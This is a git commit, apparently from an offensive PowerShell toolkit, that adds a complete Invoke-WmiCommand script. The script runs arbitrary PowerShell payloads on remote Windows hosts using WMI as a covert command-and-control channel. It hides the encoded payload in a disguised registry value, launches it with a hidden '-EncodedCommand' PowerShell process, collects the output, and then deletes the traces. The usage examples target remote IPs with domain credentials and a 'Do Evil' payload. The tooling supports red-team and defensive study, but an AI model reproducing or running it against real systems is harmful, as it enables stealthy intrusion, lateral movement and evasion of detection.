Adding Invoke-WmiCommand

2015-09-23 15:25:39 -07:00 · 2015-09-23 15:25:39 -07:00 · 03ed2adb56
parent 5ce61e40f5
commit 03ed2adb56
3 changed files with 339 additions and 1 deletions
--- a/CodeExecution/CodeExecution.psd1
+++ b/CodeExecution/CodeExecution.psd1
@ -74,7 +74,7 @@ ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID =
 # List of all files packaged with this module
 FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke--Shellcode.ps1', 'Invoke-DllInjection.ps1', 
-               'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Usage.md'
+               'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md'
 # Private data to pass to the module specified in RootModule/ModuleToProcess
 # PrivateData = ''
--- a/CodeExecution/Invoke-WmiCommand.ps1
+++ b/CodeExecution/Invoke-WmiCommand.ps1
@ -0,0 +1,334 @@
 #Requires -Version 2
 function Invoke-WmiCommand {
 <#
 .SYNOPSIS
 Executes a PowerShell ScriptBlock on a target computer using WMI as a
 pure C2 channel.
 Author: Matthew Graeber
 License: BSD 3-Clause
 Required Dependencies: None
 Optional Dependencies: None
 .DESCRIPTION
 Invoke-WmiCommand executes a PowerShell ScriptBlock on a target
 computer using WMI as a pure C2 channel. It does this by using the
 StdRegProv WMI registry provider methods to store a payload into a
 registry value. The command is then executed on the victim system and
 the output is stored in another registry value that is then retrieved
 remotely.
 .PARAMETER Payload
 Specifies the payload to be executed on the remote system.
 .PARAMETER RegistryKeyPath
 Specifies the registry key where the payload and payload output will
 be stored.
 .PARAMETER RegistryPayloadValueName
 Specifies the registry value name where the payload will be stored.
 .PARAMETER RegistryResultValueName
 Specifies the registry value name where the payload output will be
 stored.
 .PARAMETER ComputerName
 Runs the command on the specified computers. The default is the local
 computer.
 Type the NetBIOS name, an IP address, or a fully qualified domain
 name of one or more computers. To specify the local computer, type
 the computer name, a dot (.), or "localhost".
 This parameter does not rely on Windows PowerShell remoting. You can
 use the ComputerName parameter even if your computer is not
 configured to run remote commands.
 .PARAMETER Credential
 Specifies a user account that has permission to perform this action.
 The default is the current user. Type a user name, such as "User01",
 "Domain01\User01", or User@Contoso.com. Or, enter a PSCredential
 object, such as an object that is returned by the Get-Credential
 cmdlet. When you type a user name, you will be prompted for a
 password.
 .PARAMETER Impersonation
 Specifies the impersonation level to use. Valid values are:
 0: Default (Reads the local registry for the default impersonation level, which is usually set to "3: Impersonate".)
 1: Anonymous (Hides the credentials of the caller.)
 2: Identify (Allows objects to query the credentials of the caller.)
 3: Impersonate (Allows objects to use the credentials of the caller.)
 4: Delegate (Allows objects to permit other objects to use the credentials of the caller.)
 .PARAMETER Authentication
 Specifies the authentication level to be used with the WMI connection. Valid values are:
 -1: Unchanged
 0: Default
 1: None (No authentication in performed.)
 2: Connect (Authentication is performed only when the client establishes a relationship with the application.)
 3: Call (Authentication is performed only at the beginning of each call when the application receives the request.)
 4: Packet (Authentication is performed on all the data that is received from the client.)
 5: PacketIntegrity (All the data that is transferred between the client  and the application is authenticated and verified.)
 6: PacketPrivacy (The properties of the other authentication levels are used, and all the data is encrypted.)
 .PARAMETER EnableAllPrivileges
 Enables all the privileges of the current user before the command
 makes the WMI call.
 .PARAMETER Authority
 Specifies the authority to use to authenticate the WMI connection.
 You can specify standard NTLM or Kerberos authentication. To use
 NTLM, set the authority setting to ntlmdomain:<DomainName>, where
 <DomainName> identifies a valid NTLM domain name. To use Kerberos,
 specify kerberos:<DomainName\ServerName>. You cannot include the
 authority setting when you connect to the local computer.
 .EXAMPLE
 PS C:\>Invoke-WmiCommand -Payload { if ($True) { 'Do Evil' } } -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1'
 .EXAMPLE
 PS C:\>$Hosts = Get-Content hostnames.txt
 PS C:\>$Payload = Get-Content payload.ps1
 PS C:\>$Credential = Get-Credential 'TargetDomain\TargetUser'
 PS C:\>$Hosts | Invoke-WmiCommand -Payload $Payload -Credential $Credential
 .EXAMPLE
 PS C:\>$Payload = Get-Content payload.ps1
 PS C:\>Invoke-WmiCommand -Payload $Payload -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1', '10.10.1.2'
 .EXAMPLE
 PS C:/>Invoke-WmiCommand -Payload { 1+3+2+1+1 } -RegistryHive HKEY_LOCAL_MACHINE -RegistryKeyPath 'SOFTWARE\testkey' -RegistryPayloadValueName 'testvalue' -RegistryResultValueName 'testresult' -ComputerName '10.10.1.1' -Credential 'TargetHost\Administrator' -Verbose
 .INPUTS
 System.String[]
 Accepts one or more host names/IP addresses over the pipeline.
 .OUTPUTS
 System.Management.Automation.PSObject
 Outputs a custom object consisting of the target computer name and
 the output of the command executed.
 .NOTES
 In order to receive the output from your payload, it must return
 actual objects. For example, Write-Host doesn't return objects
 rather, it writes directly to the console. If you're using
 Write-Host in your scripts though, you probably don't deserve to get
 the output of your payload back. :P
 #>
    [CmdletBinding()]
    Param (
        [Parameter( Mandatory = $True )]
        [ScriptBlock]
        $Payload,
        [String]
        [ValidateSet( 'HKEY_LOCAL_MACHINE',
                      'HKEY_CURRENT_USER',
                      'HKEY_CLASSES_ROOT',
                      'HKEY_USERS',
                      'HKEY_CURRENT_CONFIG' )]
        $RegistryHive = 'HKEY_CURRENT_USER',
        [String]
        [ValidateNotNullOrEmpty()]
        $RegistryKeyPath = 'SOFTWARE\Microsoft\Cryptography\RNG',
        [String]
        [ValidateNotNullOrEmpty()]
        $RegistryPayloadValueName = 'Seed',
        [String]
        [ValidateNotNullOrEmpty()]
        $RegistryResultValueName = 'Value',
        [Parameter( ValueFromPipeline = $True )]
        [Alias('Cn')]
        [String[]]
        [ValidateNotNullOrEmpty()]
        $ComputerName = 'localhost',
        [Management.Automation.PSCredential]
        [Management.Automation.CredentialAttribute()]
        $Credential,
        [Management.ImpersonationLevel]
        $Impersonation,
        [System.Management.AuthenticationLevel]
        $Authentication,
        [Switch]
        $EnableAllPrivileges,
        [String]
        $Authority
    )
    BEGIN {
        switch ($RegistryHive) {
            'HKEY_LOCAL_MACHINE' { $Hive = 2147483650 }
            'HKEY_CURRENT_USER' { $Hive = 2147483649 }
            'HKEY_CLASSES_ROOT' { $Hive = 2147483648 }
            'HKEY_USERS' { $Hive = 2147483651 }
            'HKEY_CURRENT_CONFIG' { $Hive = 2147483653 }
        }
        $WmiMethodArgs = @{}
        # If additional WMI cmdlet properties were provided, proxy them to Invoke-WmiMethod
        if ($PSBoundParameters['Credential']) { $WmiMethodArgs['Credential'] = $Credential }
        if ($PSBoundParameters['Impersonation']) { $WmiMethodArgs['Impersonation'] = $Impersonation }
        if ($PSBoundParameters['Authentication']) { $WmiMethodArgs['Authentication'] = $Authentication }
        if ($PSBoundParameters['EnableAllPrivileges']) { $WmiMethodArgs['EnableAllPrivileges'] = $EnableAllPrivileges }
        if ($PSBoundParameters['Authority']) { $WmiMethodArgs['Authority'] = $Authority }
        $AccessPermissions = @{
            KEY_QUERY_VALUE = 1
            KEY_SET_VALUE = 2
            KEY_CREATE_SUB_KEY = 4
            KEY_CREATE = 32
            DELETE = 65536
        }
        # These are all of the registry permissions we'll require
        $RequiredPermissions = $AccessPermissions['KEY_QUERY_VALUE'] -bor
                               $AccessPermissions['KEY_SET_VALUE'] -bor
                               $AccessPermissions['KEY_CREATE_SUB_KEY'] -bor
                               $AccessPermissions['KEY_CREATE'] -bor
                               $AccessPermissions['DELETE']
    }
    PROCESS {
        foreach ($Computer in $ComputerName) {
            # Pass the individual computer name to Invoke-WmiMethod
            $WmiMethodArgs['ComputerName'] = $Computer
            Write-Verbose "[$Computer] Creating the following registry key: $RegistryHive\$RegistryKeyPath"
            $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\default' -Class 'StdRegProv' -Name 'CreateKey' -ArgumentList $Hive, $RegistryKeyPath
            if ($Result.ReturnValue -ne 0) {
                throw "[$Computer] Unable to create the following registry key: $RegistryHive\$RegistryKeyPath"
            }
            Write-Verbose "[$Computer] Validating read/write/delete privileges for the following registry key: $RegistryHive\$RegistryKeyPath"
            $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\default' -Class 'StdRegProv' -Name 'CheckAccess' -ArgumentList $Hive, $RegistryKeyPath, $RequiredPermissions
            if (-not $Result.bGranted) {
                throw "[$Computer] You do not have permission to perform all the registry operations necessary for Invoke-WmiCommand."
            }
            $EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Payload))
            Write-Verbose "[$Computer] Storing the payload into the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"
            $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\default' -Class 'StdRegProv' -Name 'SetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $EncodedPayload, $RegistryPayloadValueName
            if ($Result.ReturnValue -ne 0) {
                throw "[$Computer] Unable to store the payload in the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"
            }
            # Prep the script runner payload from the remote system
            $PayloadRunnerArgs = @"
                `$Hive = '$Hive'
                `$RegistryKeyPath = '$RegistryKeyPath'
                `$RegistryPayloadValueName = '$RegistryPayloadValueName'
                `$RegistryResultValueName = '$RegistryResultValueName'
                `n
 "@
            $RemotePayloadRunner = $PayloadRunnerArgs + {
                $WmiMethodArgs = @{
                    Namespace = 'Root\default'
                    Class = 'StdRegProv'
                }
                $Result = Invoke-WmiMethod @WmiMethodArgs -Name 'GetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $RegistryPayloadValueName
                if (($Result.ReturnValue -eq 0) -and ($Result.sValue)) {
                    $Payload = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Result.sValue))
                    $SerilizedPayloadResult = Invoke-Expression ($Payload) | % {
                        [Management.Automation.PSSerializer]::Serialize($_, 4)
                    }
                    $null = Invoke-WmiMethod @WmiMethodArgs -Name 'SetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $SerilizedPayloadResult, $RegistryResultValueName
                    $null = Invoke-WmiMethod @WmiMethodArgs -Name 'DeleteValue' -ArgumentList $Hive, $RegistryKeyPath, $RegistryPayloadValueName
                }
            }
            $Base64Payload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($RemotePayloadRunner))
            $Cmdline = "powershell -WindowStyle Hidden -NoProfile -EncodedCommand $Base64Payload"
            # Execute the payload runner on the remote system
            $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\cimv2' -Class 'Win32_Process' -Name 'Create' -ArgumentList $Cmdline
            Start-Sleep -Seconds 5
            if ($Result.ReturnValue -ne 0) {
                throw "[$Computer] Unable execute payload stored within the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"
            }
            Write-Verbose "[$Computer] Payload successfully executed from: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"
            $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\default' -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $RegistryResultValueName
            if ($Result.ReturnValue -ne 0) {
                throw "[$Computer] Unable retrieve the payload results from the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryResultValueName"
            }
            Write-Verbose "[$Computer] Payload results successfully retrieved from: $RegistryHive\$RegistryKeyPath\$RegistryResultValueName"
            $SerilizedPayloadResult = $Result.sValue
            $PayloadResult = [Management.Automation.PSSerializer]::Deserialize($SerilizedPayloadResult)
            $FinalResult = New-Object PSObject -Property @{
                PSComputerName = $Computer
                PayloadOutput = $PayloadResult
            }
            Write-Verbose "[$Computer] Removing the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryResultValueName"
            $null = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\default' -Class 'StdRegProv' -Name 'DeleteValue' -ArgumentList $Hive, $RegistryKeyPath, $RegistryResultValueName
            Write-Verbose "[$Computer] Removing the following registry key: $RegistryHive\$RegistryKeyPath"
            $null = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\default' -Class 'StdRegProv' -Name 'DeleteKey' -ArgumentList $Hive, $RegistryKeyPath
            return $FinalResult
        }
    }
 }
--- a/README.md
+++ b/README.md
@ -22,6 +22,10 @@ Injects shellcode into the process ID of your choosing or within PowerShell loca
 Execute shellcode within the context of the running PowerShell process without making any Win32 function calls.
 #### `Invoke-WmiCommand`
 Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel.
 ## ScriptModification
 **Modify and/or prepare scripts for execution on a compromised machine.**